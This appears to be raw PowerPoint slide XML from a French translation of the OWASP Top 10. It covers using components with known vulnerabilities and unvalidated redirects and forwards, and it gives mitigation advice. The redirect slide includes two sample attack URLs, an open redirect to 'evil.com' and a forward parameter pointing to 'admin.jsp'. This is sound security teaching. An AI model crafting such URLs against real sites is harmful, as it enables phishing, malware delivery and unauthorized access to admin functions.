              <a:rPr lang="fr-FR" sz="900" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Exposures</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="900" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Utilisation de composants avec des vulnérabilités connues</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>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fr-FR" dirty="0" smtClean="0"/>
              <a:t>A9</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="217438" y="1014596"/>
            <a:ext cx="6467690" cy="585604"/>
            <a:chOff x="217438" y="1014596"/>
            <a:chExt cx="6467690" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="217438" y="1014596"/>
              <a:ext cx="6467690" cy="585604"/>
              <a:chOff x="217438" y="997424"/>
              <a:chExt cx="6467690" cy="585604"/>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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Faiblesses de </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Sécurité</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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fr-FR" sz="900" b="1"/>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fr-FR" sz="900" b="1"/>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fr-FR" sz="900" b="1"/>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fr-FR" sz="900" b="1"/>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fr-FR" sz="900" b="1"/>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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>D’attaque</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Techniques</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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217438" y="1280701"/>
                <a:ext cx="691215" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Facteur de</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>menace</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Métiers</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR"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fr-FR" sz="900" b="1"/>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8" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3581400"/>
            <a:ext cx="3383280" cy="25908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80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment m’en protéger?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="300" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Une option est de ne pas utiliser des composants que vous n’avez pas vous même codé.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mais de manière plus raisonnable, la meilleure manière de gérer ce risque reste de s’assurer que les composants sont à jour.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:endParaRPr lang="fr-FR" sz="700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De nombreux projets libres (et d’autres codes source de composants) ne fournissent pas de correctifs de sécurité pour les anciennes versions du projet. Le problème étant simplement corrigés dans la version suivante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="fr-FR" sz="700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les projets logiciels devraient avoir un processus en place pour :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identifier les composants et leurs versions utilisés, ainsi que les  dépendances (ex: le plugin des versions).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Surveiller les bases de données publiques, les listes de diffusion des projets et les listes de diffusion de sécurité afin de s’assurer de la sécurité de ces composants afin de les maintenir à jour.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600" algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Établir des politiques de sécurité pour l’utilisation des composants, tels que la mise en place de pratiques de développement, le passage avec succès des recettes sécurité et l’utilisation de composants sous License.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3776575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3907127623"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="914400"/>
          <a:ext cx="6858000" cy="2773680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="990600"/>
                <a:gridCol w="1295400"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="685800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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82446">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="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000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitation</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RARE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fr-FR" sz="1000" b="1" noProof="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Détection</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="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fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODEREE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" b="1" noProof="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="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51035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez toute personne pouvant tromper vos utilisateurs lors d’une requête sur votre site web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. N’importe quel site web ou flux HTML peut être utilisé à cette fin.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="900" noProof="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fr-FR" sz="900" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Un attaquant utilise des redirections non validées afin d’inciter l’utilisateur à cliquer sur un lien. Les victimes sont en confiance car les liens pointent vers un site connu. Les renvois non sûrs sont exploités par les attaquants afin de contourner les mécanismes de sécurité.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="900" noProof="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" b="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Les applications utilisent fréquemment les redirections et les renvois pour rediriger les utilisateurs vers d'autres pages. Parfois la page cible est spécifiée dans un paramètre non validé, permettant à un attaquant de choisir la page de destination.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" b="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>La détection de redirections non vérifiées est facile : recherchez des redirections où l'URL complète peut être modifiée. La détection de renvois non vérifiés est plus compliquée puisqu'ils ciblent des pages internes.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="900" b="0" baseline="0" noProof="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fr-FR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Certaines redirections essayent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> d’encourager les victimes à installer des logiciels malicieux ou à fournir des informations sensibles. Des renvois non sûrs peuvent amener le contournement de contrôles d’accès.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="900" noProof="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fr-FR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Quelle est</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>la valeur associée à la confiance</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de vos utilisateurs.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="900" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="900" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Quel serait l’impact en cas de compromission d’un logiciel malveillant ? Quel serait l’impact si un attaquant accédait aux fonctions internes de l’application ? </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="900" noProof="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77000"/>
            <a:ext cx="3383280" cy="2667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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemples de Scénarios d’Attaque</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Une application possède une page “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>redirect.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” disposant d’un seul paramètre nommé “url”. Un attaquant forge une URL permettant de rediriger les utilisateurs vers un site malveillant (tentative de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ou installation de malwares).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/redirect.jsp?url=evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Une application effectue des renvois pour rediriger les utilisateurs sur certaines pages internes. Pour simplifier le renvoi, certaines pages utilisent un paramètre contenant la page où doit être renvoyer l’utilisateur. Dans ce cas, un attaquant crée une URL satisfaisant les contrôles d'accès de l'application et le redirigeant ensuite vers une fonction d’administration à laquelle il ne devrait pas avoir accès.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/boring.jsp?fwd=admin.jsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3581400"/>
            <a:ext cx="3383280" cy="28194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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis-je vulnérable?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="300" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
